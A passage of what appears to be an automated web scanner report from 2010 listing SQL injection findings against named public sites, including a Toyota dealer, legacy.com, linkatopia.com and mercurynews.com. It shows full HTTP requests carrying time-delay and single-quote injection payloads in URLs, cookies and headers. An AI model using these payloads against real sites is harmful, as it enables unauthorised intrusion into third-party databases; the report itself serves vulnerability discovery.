Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792'waitfor%20delay'0%3a0%3a20'--; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:43:48 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 82433


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving
...[SNIP]...

1.162. http://www.fremonttoyota.com/quick-quote.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /quick-quote.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the REST URL parameter 1. The application took 34865 milliseconds to respond to the request, compared with 394 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /quick-quote.html',0)waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 04:22:13 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 47946

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - Serving Stockton - Serving Watso
...[SNIP]...

1.163. http://www.fremonttoyota.com/search/CPO+t [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /search/CPO+t

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmz cookie. The application took 85392 milliseconds to respond to the request, compared with 28373 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /search/CPO+t HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)',0)waitfor%20delay'0%3a0%3a20'--; PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:06:07 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 92151


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Certified Pre-Owned Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serv
...[SNIP]...

1.164. http://www.fremonttoyota.com/search/New+Toyota+tm [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fremonttoyota.com
Path:   /search/New+Toyota+tm

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. The payload ,0,0,0)waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmb cookie. The application took 51229 milliseconds to respond to the request, compared with 23804 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /search/New+Toyota+tm HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792,0,0,0)waitfor%20delay'0%3a0%3a20'--; BIGipServerAPACHE_DEV=2936078602.20480.0000;

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 04:52:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 82699


<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Toyota Inventory Search - Fremont Toyota - Toyota - Serving Oakland - Serving San Jose - S
...[SNIP]...

1.165. http://www.legacy.com/services/obitrss.asp [Source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.legacy.com
Path:   /services/obitrss.asp

Issue detail

The Source parameter appears to be vulnerable to SQL injection attacks. The payload 'waitfor%20delay'0%3a0%3a20'-- was submitted in the Source parameter. The application took 20353 milliseconds to respond to the request, compared with 263 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /services/obitrss.asp?Source=MercuryNews'waitfor%20delay'0%3a0%3a20'-- HTTP/1.1
Host: www.legacy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 06:02:57 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Content-Type: text/xml
Set-Cookie: ASPSESSIONIDCSSDBCCC=BDEJAEIDNCFFJDLHCNDJDOAD; path=/
Cache-control: private
Content-Length: 422

<?xml version="1.0" encoding="iso-8859-1"?>
<rss version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel>
<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font
...[SNIP]...

1.166. http://www.linkatopia.com/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=rpqctedmaoqs1lp8qp6m2t1237; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 21
Connection: close
Content-Type: text/html

Update referer failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:54 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=129vt2sagrtpoiqhi4qnliurm6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.167. http://www.linkatopia.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=23jlt2alhsimpjdb83thqj1bk1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update user agent failed

Request 2

GET / HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l5hsujb84ieisgntdm6051n617; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.168. http://www.linkatopia.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.linkatopia.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /?1'=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ck8dha87tii3i18d86dla33dp1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Content-Length: 24
Connection: close
Content-Type: text/html

Update page count failed

Request 2

GET /?1''=1 HTTP/1.1
Host: www.linkatopia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 05:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=l2lgsa9e86pdberkmocnijggr3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 15233

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Linka
...[SNIP]...

1.169. http://www.mercurynews.com/49ers/ci_16794130 [fPage cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.mercurynews.com
Path:   /49ers/ci_16794130

Issue detail

The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /49ers/ci_16794130?source=most_viewed HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:46:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:46:41 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=ZVPVYHVZPOBHYCUUCBWCFFA; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 74627

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='When asked if the 49ers had committed to Troy Smith for the rest of the season, coach Mike
...[SNIP]...
g name, server, and channel on
the next lines. */

           s.pageName=FriendlyName;
s.channel="Home"; // Same as prop1
s.server="";// Blank
s.pageType=""; // Error pages ONLY

s.prop1="D=g";